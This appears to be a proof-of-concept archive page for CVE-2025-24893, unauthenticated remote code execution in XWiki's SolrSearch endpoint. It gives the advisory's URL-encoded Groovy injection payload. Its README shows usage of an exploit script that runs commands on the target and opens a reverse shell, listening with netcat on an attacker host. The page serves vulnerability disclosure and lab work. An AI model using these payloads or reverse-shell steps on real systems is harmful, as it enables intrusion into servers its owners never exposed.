Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/torjan0/xwiki_solrsearch-rce-exploit
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
Unauth RCE PoC for XWiki SolrSearch (CVE-2025-24893). Command exec + reverse shell. Built during process of pwning HTB “Editor”
Readme
# solrsearch-rce-exploit
Unauth RCE PoC for XWiki SolrSearch (CVE-2025-24893). Command exec + reverse shell. Built during process of pwning HTB “Editor”

# CVE-2025-24893 – XWiki SolrSearch RCE PoC

Proof-of-concept for the XWiki `SolrSearch` template injection leading to unauthenticated remote code execution.

Tested against **XWiki Debian 15.10.8** (patched in 15.10.11 / 16.4.1 / 16.5.0RC1).

> ⚠️ Educational use only. Do not run this against systems you do not own or have explicit permission to test.

## What it does
- Sends crafted Groovy payloads through `/xwiki/bin/get/Main/SolrSearch`.
- Executes arbitrary commands and wraps output in Base64 markers for clean decoding.
- Supports launching a reverse shell using Java sockets.

## Requirements
- Python 3.x
- Install dependencies with:
```bash
pip install requests
```

## Usage

Specify the target host (and optional path) when running the script.

Run basic commands:
```bash
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
```

Start a reverse shell:
```bash
# On attacker box
nc -lvnp 4444

# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
```

## Notes
- Endpoint: `/xwiki/bin/get/Main/SolrSearch?media=rss&text=...`
- Clean Base64 output ensures reliable parsing.
- Originally demonstrated during HTB *Editor*, but applicable to other vulnerable instances.
- https://nvd.nist.gov/vuln/detail/CVE-2025-24893
File Snapshot

 [4.0K]  /data/pocs/7b93d6189b0e8d1c987c70a75efe0a9e4f58d1fa
├── [1.0K]  LICENSE
├── [1.5K]  README.md
└── [5.1K]  xwiki_solr_rce.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →